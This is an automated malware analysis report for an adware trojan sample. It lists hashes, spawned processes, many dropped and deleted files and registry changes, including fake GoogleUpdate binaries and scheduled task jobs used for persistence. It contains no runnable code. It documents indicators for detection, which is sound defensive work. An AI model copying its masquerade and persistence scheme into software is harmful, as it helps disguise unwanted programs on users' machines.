Skip to main content

Trojan.Win32.Alureon_33f4c0b6bc


not-a-virus:AdWare.NSIS.Adwapper.cd (Kaspersky), Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 33f4c0b6bc10c582d33ea7f8431b8c85

SHA1: 59d908a83367fb69ee4853ff33c83333deca5bb6

SHA256: cbc1dbbc5607c23186b73e5cb13b979ab668d403308b48fd9bf8342860958a37

SSDeep: 196608:q3t6ahuiKVf6FkqPgGczMsCAsRG7jEik/Ce3e4sP/fbSUTcRyQvCrvH:q3tBwiofwVYGodjFIBDUTcPq7H

Size: 11336880 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2012-12-04 15:55:02

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

GoogleUpdate.exe:1300
GoogleUpdate.exe:1220
GoogleUpdate.exe:1272
GoogleUpdate.exe:3944
GoogleUpdate.exe:476
GoogleUpdate.exe:2032
GoogleUpdate.exe:1936
17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600
f56fe68c-ded6-4656-a272-5100e7b20016.exe:356
17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676
17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936
winservice86-bg.exe:2952
winservice86-codedownloader.exe:2888
winservice86-codedownloader.exe:2796
regsvr32.exe:2472
%original file name%.exe:1332
0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000

The Trojan injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process GoogleUpdate.exe:1272 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (930 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (49 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MSIcdd94.LOG (474 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (0 bytes)

The process GoogleUpdate.exe:2032 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (7547 bytes)

The Trojan deletes the following file(s):

%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{802A0BF3-D6B3-4F6C-B8D7-B6C3243887F5}-setup.exe (0 bytes)
%Program Files%\globalUpdate\Update\Install (0 bytes)

The process f56fe68c-ded6-4656-a272-5100e7b20016.exe:356 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 (113 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70 (75 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70 (232 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404 (228 bytes)

The process winservice86-codedownloader.exe:2888 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[2].xml (25 bytes)

The process %original file name%.exe:1332 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdate.dll (5441 bytes)
%Program Files%\winservice86\b0eae4e3-6b8d-4874-83f1-2ee3fd4e727b.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (45051 bytes)
%Program Files%\winservice86\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\winservice86\winservice86-bho.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (1358266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (825 bytes)
%Program Files%\winservice86\Newtonsoft.Json.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\200[1].js (887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr2.tmp (605555 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Common.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\424[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\plugins[1].json (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\220[1].js (19969 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.xpi (1425 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Protocol.dll (19 bytes)
%Program Files%\winservice86\winservice86-codedownloader.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (4 bytes)
%Program Files%\winservice86\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\winservice86\winservice86.ico (9 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\288[1].js (963 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-11.job (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\winservice86\winservice86-bg.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll (1281 bytes)
%WinDir%\Tasks\f56fe68c-ded6-4656-a272-5100e7b20016.job (1620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (1 bytes)
%Program Files%\winservice86\WebSocket4Net.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\91[1].js (88337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\345[1].js (781 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-1.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\winservice86\Interop.IWshRuntimeLibrary.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (34023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (1 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (1066 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdateres_en.dll (26 bytes)
%Program Files%\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (614 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\380[1].js (25 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateHelper.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (5 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-2.job (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (1 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe (5873 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (1 bytes)
%Program Files%\winservice86\utils.exe (76825 bytes)
%WinDir%\Tasks\0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (70 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe (601 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (359414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (3 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\339[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\311[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg_code[1].js (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (43318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (4 bytes)
%Program Files%\winservice86\Uninstall.exe (601 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Core.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (410 bytes)
%Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (0 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (0 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (0 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (0 bytes)

Registry activity

The process GoogleUpdate.exe:1300 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 30 68 94 0B 1C F4 87 36 47 06 A6 66 63 A0 D0"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:1220 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

